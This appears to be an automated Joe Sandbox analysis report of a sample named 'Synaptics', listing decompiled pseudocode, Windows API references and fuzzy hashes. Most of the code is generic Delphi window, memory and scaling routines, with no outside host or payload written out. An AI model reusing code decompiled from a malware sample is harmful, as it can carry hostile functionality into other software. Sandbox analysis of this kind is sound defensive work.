                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Internet$CloseHandleOpen$FileRead
                                                                                                                                                                                                                            • String ID: MyApp
                                                                                                                                                                                                                            • API String ID: 3121278467-2115267534
                                                                                                                                                                                                                            • Opcode ID: 0ddd16eab12d4d076789ab758048c61251c9022f90b699c7751c9190b1dbe1f3
                                                                                                                                                                                                                            • Instruction ID: 49772c5e95778878b0e4af45138c7482376825189897ce4c7807679e07b59e25
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0ddd16eab12d4d076789ab758048c61251c9022f90b699c7751c9190b1dbe1f3
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2C31A7B1A04748ABE711DBA5DC12BDA77BCE748704F6184BAB704E76C0D6BC5940CA5C
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 93%
                                                                                                                                                                                                                            			E00422C88(intOrPtr _a4, short _a6, intOrPtr _a8) {
                                                                                                                                                                                                                            				struct _WNDCLASSA _v44;
                                                                                                                                                                                                                            				struct HINSTANCE__* _t6;
                                                                                                                                                                                                                            				CHAR* _t8;
                                                                                                                                                                                                                            				struct HINSTANCE__* _t9;
                                                                                                                                                                                                                            				int _t10;
                                                                                                                                                                                                                            				void* _t11;
                                                                                                                                                                                                                            				struct HINSTANCE__* _t13;
                                                                                                                                                                                                                            				struct HWND__* _t15;
                                                                                                                                                                                                                            				struct HINSTANCE__* _t19;
                                                                                                                                                                                                                            				CHAR* _t20;
                                                                                                                                                                                                                            				struct HWND__* _t22;
                                                                                                                                                                                                                            				CHAR* _t24;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t6 =  *0x49e668; // 0x400000
                                                                                                                                                                                                                            				 *0x49b5dc = _t6;
                                                                                                                                                                                                                            				_t8 =  *0x49b5f0; // 0x422c78
                                                                                                                                                                                                                            				_t9 =  *0x49e668; // 0x400000
                                                                                                                                                                                                                            				_t10 = GetClassInfoA(_t9, _t8,  &_v44);
                                                                                                                                                                                                                            				asm("sbb eax, eax");
                                                                                                                                                                                                                            				_t11 = _t10 + 1;
                                                                                                                                                                                                                            				if(_t11 == 0 || L00407540 != _v44.lpfnWndProc) {
                                                                                                                                                                                                                            					if(_t11 != 0) {
                                                                                                                                                                                                                            						_t19 =  *0x49e668; // 0x400000
                                                                                                                                                                                                                            						_t20 =  *0x49b5f0; // 0x422c78
                                                                                                                                                                                                                            						UnregisterClassA(_t20, _t19);
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					RegisterClassA(0x49b5cc);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_t13 =  *0x49e668; // 0x400000
                                                                                                                                                                                                                            				_t24 =  *0x49b5f0; // 0x422c78
                                                                                                                                                                                                                            				_t15 = E00407A8C(0x80, _t24, 0, _t13, 0, 0, 0, 0, 0, 0, 0x80000000); // executed
                                                                                                                                                                                                                            				_t22 = _t15;
                                                                                                                                                                                                                            				if(_a6 != 0) {
                                                                                                                                                                                                                            					SetWindowLongA(_t22, 0xfffffffc, E00422BCC(_a4, _a8));
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				return _t22;
                                                                                                                                                                                                                            			}
















                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Class$InfoLongRegisterUnregisterWindow
                                                                                                                                                                                                                            • String ID: TPUtilWindow$x,B
                                                                                                                                                                                                                            • API String ID: 4025006896-1057714546
                                                                                                                                                                                                                            • Opcode ID: cebccb0ec9a9405ea43d2313997cbfa4afe76ef610b176b8fc2697447ba8c785
                                                                                                                                                                                                                            • Instruction ID: 5edbcaf682720338496e3359f8b598ec737c219f81609156ea6670bddb9c1a51
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cebccb0ec9a9405ea43d2313997cbfa4afe76ef610b176b8fc2697447ba8c785
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E0018E71744204BBDB00EB6AED81F9A7399EB28718F544137F904E73A1D679AC40CBAD
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E00437D70(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                                                                                                                            				char _v8;
                                                                                                                                                                                                                            				void* _t20;
                                                                                                                                                                                                                            				void* _t21;
                                                                                                                                                                                                                            				void* _t27;
                                                                                                                                                                                                                            				void* _t31;
                                                                                                                                                                                                                            				void* _t35;
                                                                                                                                                                                                                            				intOrPtr* _t43;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t43 =  &_v8;
                                                                                                                                                                                                                            				_t20 =  *0x49bc20; // 0x0
                                                                                                                                                                                                                            				 *((intOrPtr*)(_t20 + 0x180)) = _a4;
                                                                                                                                                                                                                            				_t21 =  *0x49bc20; // 0x0
                                                                                                                                                                                                                            				SetWindowLongA(_a4, 0xfffffffc,  *(_t21 + 0x18c));
                                                                                                                                                                                                                            				if((GetWindowLongA(_a4, 0xfffffff0) & 0x40000000) != 0 && GetWindowLongA(_a4, 0xfffffff4) == 0) {
                                                                                                                                                                                                                            					SetWindowLongA(_a4, 0xfffffff4, _a4);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_t27 =  *0x49bc20; // 0x0
                                                                                                                                                                                                                            				SetPropA(_a4,  *0x49eb26 & 0x0000ffff, _t27);
                                                                                                                                                                                                                            				_t31 =  *0x49bc20; // 0x0
                                                                                                                                                                                                                            				SetPropA(_a4,  *0x49eb24 & 0x0000ffff, _t31);
                                                                                                                                                                                                                            				_t35 =  *0x49bc20; // 0x0
                                                                                                                                                                                                                            				 *0x49bc20 = 0; // executed
                                                                                                                                                                                                                            				_v8 =  *((intOrPtr*)(_t35 + 0x18c))(_a4, _a8, _a12, _a16);
                                                                                                                                                                                                                            				return  *_t43;
                                                                                                                                                                                                                            			}











                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • SetWindowLongA.USER32 ref: 00437D98
                                                                                                                                                                                                                            • GetWindowLongA.USER32 ref: 00437DA3
                                                                                                                                                                                                                            • GetWindowLongA.USER32 ref: 00437DB5
                                                                                                                                                                                                                            • SetWindowLongA.USER32 ref: 00437DC8
                                                                                                                                                                                                                            • SetPropA.USER32(?,00000000,00000000), ref: 00437DDF
                                                                                                                                                                                                                            • SetPropA.USER32(?,00000000,00000000), ref: 00437DF6
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: LongWindow$Prop
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3887896539-0
                                                                                                                                                                                                                            • Opcode ID: 51d6e6583fdfce383e099e89a982cca909cf1dddc6894a580fa6964d4a767a4a
                                                                                                                                                                                                                            • Instruction ID: b5f16ed505960de4fc23b1fb6768328cc78d5017c86fd9e1eb6bf423726d3339
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 51d6e6583fdfce383e099e89a982cca909cf1dddc6894a580fa6964d4a767a4a
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0111CCB5504208BFDB10DF9DDD84EAA37E8EB1C354F10462AF914DB2A1DB34E9409BA9
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 84%
                                                                                                                                                                                                                            			E00457FC8(char __edx, void* __edi) {
                                                                                                                                                                                                                            				char _v5;
                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                            				void* __ecx;
                                                                                                                                                                                                                            				void* __ebp;
                                                                                                                                                                                                                            				intOrPtr _t25;
                                                                                                                                                                                                                            				intOrPtr* _t28;
                                                                                                                                                                                                                            				intOrPtr* _t29;
                                                                                                                                                                                                                            				intOrPtr _t42;
                                                                                                                                                                                                                            				intOrPtr* _t45;
                                                                                                                                                                                                                            				intOrPtr _t56;
                                                                                                                                                                                                                            				intOrPtr _t57;
                                                                                                                                                                                                                            				intOrPtr _t58;
                                                                                                                                                                                                                            				intOrPtr _t59;
                                                                                                                                                                                                                            				intOrPtr _t62;
                                                                                                                                                                                                                            				void* _t63;
                                                                                                                                                                                                                            				char _t64;
                                                                                                                                                                                                                            				void* _t74;
                                                                                                                                                                                                                            				intOrPtr _t75;
                                                                                                                                                                                                                            				void* _t76;
                                                                                                                                                                                                                            				void* _t77;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t74 = __edi;
                                                                                                                                                                                                                            				_t64 = __edx;
                                                                                                                                                                                                                            				if(__edx != 0) {
                                                                                                                                                                                                                            					_t77 = _t77 + 0xfffffff0;
                                                                                                                                                                                                                            					_t25 = E00403F10(_t25, _t76);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_v5 = _t64;
                                                                                                                                                                                                                            				_t62 = _t25;
                                                                                                                                                                                                                            				E00421B3C(_t63, 0);
                                                                                                                                                                                                                            				_t28 =  *0x49d878; // 0x49b510
                                                                                                                                                                                                                            				 *((intOrPtr*)(_t28 + 4)) = _t62;
                                                                                                                                                                                                                            				 *_t28 = 0x45836c;
                                                                                                                                                                                                                            				_t29 =  *0x49d888; // 0x49b518
                                                                                                                                                                                                                            				 *((intOrPtr*)(_t29 + 4)) = _t62;
                                                                                                                                                                                                                            				 *_t29 = 0x458378;
                                                                                                                                                                                                                            				E00458384(_t62);
                                                                                                                                                                                                                            				 *((intOrPtr*)(_t62 + 0x3c)) = GetKeyboardLayout(0);
                                                                                                                                                                                                                            				 *((intOrPtr*)(_t62 + 0x4c)) = E00403BBC(1);
                                                                                                                                                                                                                            				 *((intOrPtr*)(_t62 + 0x50)) = E00403BBC(1);
                                                                                                                                                                                                                            				 *((intOrPtr*)(_t62 + 0x54)) = E00403BBC(1);
                                                                                                                                                                                                                            				 *((intOrPtr*)(_t62 + 0x58)) = E00403BBC(1);
                                                                                                                                                                                                                            				_t42 = E00403BBC(1);
                                                                                                                                                                                                                            				 *((intOrPtr*)(_t62 + 0x7c)) = _t42;
                                                                                                                                                                                                                            				L00407638();
                                                                                                                                                                                                                            				_t75 = _t42;
                                                                                                                                                                                                                            				L00407380();
                                                                                                                                                                                                                            				 *((intOrPtr*)(_t62 + 0x40)) = _t42;
                                                                                                                                                                                                                            				L00407888();
                                                                                                                                                                                                                            				_t11 = _t62 + 0x58; // 0x45122c6e
                                                                                                                                                                                                                            				_t45 =  *0x49dae4; // 0x49e91c
                                                                                                                                                                                                                            				 *((intOrPtr*)( *_t45))(0, 0, E004547A0,  *_t11, 0, _t75, _t75, 0x5a, 0);
                                                                                                                                                                                                                            				 *((intOrPtr*)(_t62 + 0x84)) = E00424C3C(1);
                                                                                                                                                                                                                            				 *((intOrPtr*)(_t62 + 0x88)) = E00424C3C(1);
                                                                                                                                                                                                                            				 *((intOrPtr*)(_t62 + 0x80)) = E00424C3C(1);
                                                                                                                                                                                                                            				E004587A4(_t62, _t62, _t63, _t74);
                                                                                                                                                                                                                            				_t15 = _t62 + 0x84; // 0x38004010
                                                                                                                                                                                                                            				_t56 =  *_t15;
                                                                                                                                                                                                                            				 *((intOrPtr*)(_t56 + 0xc)) = _t62;
                                                                                                                                                                                                                            				 *((intOrPtr*)(_t56 + 8)) = 0x458680;
                                                                                                                                                                                                                            				_t18 = _t62 + 0x88; // 0x90000000
                                                                                                                                                                                                                            				_t57 =  *_t18;
                                                                                                                                                                                                                            				 *((intOrPtr*)(_t57 + 0xc)) = _t62;
                                                                                                                                                                                                                            				 *((intOrPtr*)(_t57 + 8)) = 0x458680;
                                                                                                                                                                                                                            				_t21 = _t62 + 0x80; // 0x94000000
                                                                                                                                                                                                                            				_t58 =  *_t21;
                                                                                                                                                                                                                            				 *((intOrPtr*)(_t58 + 0xc)) = _t62;
                                                                                                                                                                                                                            				 *((intOrPtr*)(_t58 + 8)) = 0x458680;
                                                                                                                                                                                                                            				_t59 = _t62;
                                                                                                                                                                                                                            				if(_v5 != 0) {
                                                                                                                                                                                                                            					E00403F68(_t59);
                                                                                                                                                                                                                            					_pop( *[fs:0x0]);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				return _t62;
                                                                                                                                                                                                                            			}
























                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetKeyboardLayout.USER32(00000000), ref: 0045800D
                                                                                                                                                                                                                            • 73C9AC50.USER32(00000000,?,?,00000000,?,0044642A,00000000,00000000,?,00000000,?,00000000,004464A8), ref: 00458062
                                                                                                                                                                                                                            • 73C9AD70.GDI32(00000000,0000005A,00000000,?,?,00000000,?,0044642A,00000000,00000000,?,00000000,?,00000000,004464A8), ref: 0045806C
                                                                                                                                                                                                                            • 73C9B380.USER32(00000000,00000000,00000000,0000005A,00000000,?,?,00000000,?,0044642A,00000000,00000000,?,00000000,?,00000000), ref: 00458077
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: B380KeyboardLayout
                                                                                                                                                                                                                            • String ID: 5B
                                                                                                                                                                                                                            • API String ID: 648844651-3738334870
                                                                                                                                                                                                                            • Opcode ID: f06d595c3e901a103d749baf538f62a4559fae39f106d35ce0652e1a7ae61c8d
                                                                                                                                                                                                                            • Instruction ID: 7c78f0e896318b154a236a51f14d482704da40fbffa7cbfd833c934430294294
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f06d595c3e901a103d749baf538f62a4559fae39f106d35ce0652e1a7ae61c8d
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2331EA706052049FD740EF2AD8C1B497BE5FB05319F4480BEEC08DF367DA7AA9498B59
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 68%
                                                                                                                                                                                                                            			E00401A9C() {
                                                                                                                                                                                                                            				void* _t11;
                                                                                                                                                                                                                            				signed int _t13;
                                                                                                                                                                                                                            				intOrPtr _t19;
                                                                                                                                                                                                                            				void* _t20;
                                                                                                                                                                                                                            				intOrPtr _t23;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_push(_t23);
                                                                                                                                                                                                                            				_push("\xef\xbf\xb				_push( *[fs:edx]);
                                                                                                                                                                                                                            				 *[fs:edx] = _t23;
                                                                                                                                                                                                                            				_push(0x49e5cc);
                                                                                                                                                                                                                            				L004013F0();
                                                                                                                                                                                                                            				if( *0x49e04d != 0) {
                                                                                                                                                                                                                            					_push(0x49e5cc);
                                                                                                                                                                                                                            					L004013F8();
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				E00401460(0x49e5ec);
                                                                                                                                                                                                                            				E00401460(0x49e5fc);
                                                                                                                                                                                                                            				E00401460(0x49e628);
                                                                                                                                                                                                                            				_t11 = LocalAlloc(0, 0xff8); // executed
                                                                                                                                                                                                                            				 *0x49e624 = _t11;
                                                                                                                                                                                                                            				if( *0x49e624 != 0) {
                                                                                                                                                                                                                            					_t13 = 3;
                                                                                                                                                                                                                            					do {
                                                                                                                                                                                                                            						_t20 =  *0x49e624; // 0x6524a8
                                                                                                                                                                                                                            						 *((intOrPtr*)(_t20 + _t13 * 4 - 0xc)) = 0;
                                                                                                                                                                                                                            						_t13 = _t13 + 1;
                                                                                                                                                                                                                            					} while (_t13 != 0x401);
                                                                                                                                                                                                                            					 *((intOrPtr*)(0x49e610)) = 0x49e60c;
                                                                                                                                                                                                                            					 *0x49e60c = 0x49e60c;
                                                                                                                                                                                                                            					 *0x49e618 = 0x49e60c;
                                                                                                                                                                                                                            					 *0x49e5c4 = 1;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_pop(_t19);
                                                                                                                                                                                                                            				 *[fs:eax] = _t19;
                                                                                                                                                                                                                            				_push(E00401B59);
                                                                                                                                                                                                                            				if( *0x49e04d != 0) {
                                                                                                                                                                                                                            					_push(0x49e5cc);
                                                                                                                                                                                                                            					L00401400();
                                                                                                                                                                                                                            					return 0;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				return 0;
                                                                                                                                                                                                                            			}









                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • RtlInitializeCriticalSection.KERNEL32(0049E5CC,00000000,',?,?,00402336,0049E60C,00000000,00000000,?,?,00401D25,00401D3A,00401E8B), ref: 00401AB2
                                                                                                                                                                                                                            • RtlEnterCriticalSection.KERNEL32(0049E5CC,0049E5CC,00000000,',?,?,00402336,0049E60C,00000000,00000000,?,?,00401D25,00401D3A,00401E8B), ref: 00401AC5
                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000000,00000FF8,0049E5CC,00000000,',?,?,00402336,0049E60C,00000000,00000000,?,?,00401D25,00401D3A,00401E8B), ref: 00401AEF
                                                                                                                                                                                                                            • RtlLeaveCriticalSection.KERNEL32(0049E5CC,00401B59,00000000,',?,?,00402336,0049E60C,00000000,00000000,?,?,00401D25,00401D3A,00401E8B), ref: 00401B4C
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                                                                                                                                                                                                            • String ID: '
                                                                                                                                                                                                                            • API String ID: 730355536-3744524632
                                                                                                                                                                                                                            • Opcode ID: 75eea6cd1ad15cfb1e46afda1a9ce73b7035c2e84f6dcfcc3888624585293549
                                                                                                                                                                                                                            • Instruction ID: dfc13510ffc652cdc4745fa131ecd9d2d70f716ade9f6bddb0b8d8da957d249b
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 75eea6cd1ad15cfb1e46afda1a9ce73b7035c2e84f6dcfcc3888624585293549
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E201AD70204240AEE716EB6B9816B153BD4D76970CF85807FF000A77F2E6BC6840CA1E
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 89%
                                                                                                                                                                                                                            			E004534EC(intOrPtr __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                                                                                            				intOrPtr _v8;
                                                                                                                                                                                                                            				signed char _t92;
                                                                                                                                                                                                                            				int _t98;
                                                                                                                                                                                                                            				int _t100;
                                                                                                                                                                                                                            				intOrPtr _t117;
                                                                                                                                                                                                                            				int _t122;
                                                                                                                                                                                                                            				intOrPtr _t155;
                                                                                                                                                                                                                            				void* _t164;
                                                                                                                                                                                                                            				signed char _t180;
                                                                                                                                                                                                                            				intOrPtr _t182;
                                                                                                                                                                                                                            				intOrPtr _t194;
                                                                                                                                                                                                                            				int _t199;
                                                                                                                                                                                                                            				intOrPtr _t203;
                                                                                                                                                                                                                            				void* _t204;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t204 = __eflags;
                                                                                                                                                                                                                            				_t202 = _t203;
                                                                                                                                                                                                                            				_v8 = __eax;
                                                                                                                                                                                                                            				E0043DF9C(_v8);
                                                                                                                                                                                                                            				_push(_t203);
                                                                                                                                                                                                                            				_push(0x453742);
                                                                                                                                                                                                                            				_push( *[fs:edx]);
                                                                                                                                                                                                                            				 *[fs:edx] = _t203;
                                                                                                                                                                                                                            				 *(_v8 + 0x268) = 0;
                                                                                                                                                                                                                            				 *(_v8 + 0x26c) = 0;
                                                                                                                                                                                                                            				 *(_v8 + 0x270) = 0;
                                                                                                                                                                                                                            				_t164 = 0;
                                                                                                                                                                                                                            				_t92 =  *0x49e665; // 0x0
                                                                                                                                                                                                                            				 *(_v8 + 0x234) = _t92 ^ 0x00000001;
                                                                                                                                                                                                                            				E0043D6F8(_v8, 0, __edx, _t204); // executed
                                                                                                                                                                                                                            				if( *(_v8 + 0x25c) == 0 ||  *(_v8 + 0x270) <= 0) {
                                                                                                                                                                                                                            					L12:
                                                                                                                                                                                                                            					_t98 =  *(_v8 + 0x268);
                                                                                                                                                                                                                            					_t213 = _t98;
                                                                                                                                                                                                                            					if(_t98 > 0) {
                                                                                                                                                                                                                            						E0043A998(_v8, _t98, _t213);
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_t100 =  *(_v8 + 0x26c);
                                                                                                                                                                                                                            					_t214 = _t100;
                                                                                                                                                                                                                            					if(_t100 > 0) {
                                                                                                                                                                                                                            						E0043A9DC(_v8, _t100, _t214);
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_t180 =  *0x453750; // 0x0
                                                                                                                                                                                                                            					 *(_v8 + 0x98) = _t180;
                                                                                                                                                                                                                            					_t215 = _t164;
                                                                                                                                                                                                                            					if(_t164 == 0) {
                                                                                                                                                                                                                            						E00452B4C(_v8, 1, 1);
                                                                                                                                                                                                                            						E004411C8(_v8, 1, 1, _t215);
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					E0043C130(_v8, 0, 0xb03d, 0);
                                                                                                                                                                                                                            					_pop(_t182);
                                                                                                                                                                                                                            					 *[fs:eax] = _t182;
                                                                                                                                                                                                                            					_push(0x453749);
                                                                                                                                                                                                                            					return E0043DFA4(_v8);
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					if(( *(_v8 + 0x98) & 0x00000010) != 0) {
                                                                                                                                                                                                                            						_t194 =  *0x49ebbc; // 0x21e1320
                                                                                                                                                                                                                            						_t22 = _t194 + 0x40; // 0x60
                                                                                                                                                                                                                            						if( *(_v8 + 0x25c) !=  *_t22) {
                                                                                                                                                                                                                            							_t155 =  *0x49ebbc; // 0x21e1320
                                                                                                                                                                                                                            							_t25 = _t155 + 0x40; // 0x60
                                                                                                                                                                                                                            							E00424FF8( *((intOrPtr*)(_v8 + 0x68)), MulDiv(E00424FF0( *((intOrPtr*)(_v8 + 0x68))),  *_t25,  *(_v8 + 0x25c)), __edi, _t202);
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_t117 =  *0x49ebbc; // 0x21e1320
                                                                                                                                                                                                                            					_t28 = _t117 + 0x40; // 0x60
                                                                                                                                                                                                                            					 *(_v8 + 0x25c) =  *_t28;
                                                                                                                                                                                                                            					_t199 = E00453874(_v8);
                                                                                                                                                                                                                            					_t122 =  *(_v8 + 0x270);
                                                                                                                                                                                                                            					_t209 = _t199 - _t122;
                                                                                                                                                                                                                            					if(_t199 != _t122) {
                                                                                                                                                                                                                            						_t164 = 1;
                                                                                                                                                                                                                            						E00452B4C(_v8, _t122, _t199);
                                                                                                                                                                                                                            						E004411C8(_v8,  *(_v8 + 0x270), _t199, _t209);
                                                                                                                                                                                                                            						if(( *(_v8 + 0x98) & 0x00000004) != 0) {
                                                                                                                                                                                                                            							 *(_v8 + 0x268) = MulDiv( *(_v8 + 0x268), _t199,  *(_v8 + 0x270));
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						if(( *(_v8 + 0x98) & 0x00000008) != 0) {
                                                                                                                                                                                                                            							 *(_v8 + 0x26c) = MulDiv( *(_v8 + 0x26c), _t199,  *(_v8 + 0x270));
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						if(( *(_v8 + 0x98) & 0x00000020) != 0) {
                                                                                                                                                                                                                            							 *(_v8 + 0x1fa) = MulDiv( *(_v8 + 0x1fa), _t199,  *(_v8 + 0x270));
                                                                                                                                                                                                                            							 *(_v8 + 0x1fe) = MulDiv( *(_v8 + 0x1fe), _t199,  *(_v8 + 0x270));
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					goto L12;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            			}

















                                                                                                                                                                                                                            0x004535b9
                                                                                                                                                                                                                            0x004535be
                                                                                                                                                                                                                            0x004535c4
                                                                                                                                                                                                                            0x004535d2
                                                                                                                                                                                                                            0x004535d7
                                                                                                                                                                                                                            0x004535dd
                                                                                                                                                                                                                            0x004535df
                                                                                                                                                                                                                            0x004535e5
                                                                                                                                                                                                                            0x004535ee
                                                                                                                                                                                                                            0x00453601
                                                                                                                                                                                                                            0x00453610
                                                                                                                                                                                                                            0x0045362f
                                                                                                                                                                                                                            0x0045362f
                                                                                                                                                                                                                            0x0045363f
                                                                                                                                                                                                                            0x0045365e
                                                                                                                                                                                                                            0x0045365e
                                                                                                                                                                                                                            0x0045366e
                                                                                                                                                                                                                            0x0045368d
                                                                                                                                                                                                                            0x004536b0
                                                                                                                                                                                                                            0x004536b0
                                                                                                                                                                                                                            0x0045366e
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004535df

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • MulDiv.KERNEL32(00000000,00000060,00000000), ref: 004535AB
                                                                                                                                                                                                                            • MulDiv.KERNEL32(?,00000000,00000000), ref: 00453627
                                                                                                                                                                                                                            • MulDiv.KERNEL32(?,00000000,00000000), ref: 00453656
                                                                                                                                                                                                                            • MulDiv.KERNEL32(?,00000000,00000000), ref: 00453685
                                                                                                                                                                                                                            • MulDiv.KERNEL32(?,00000000,00000000), ref: 004536A8
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
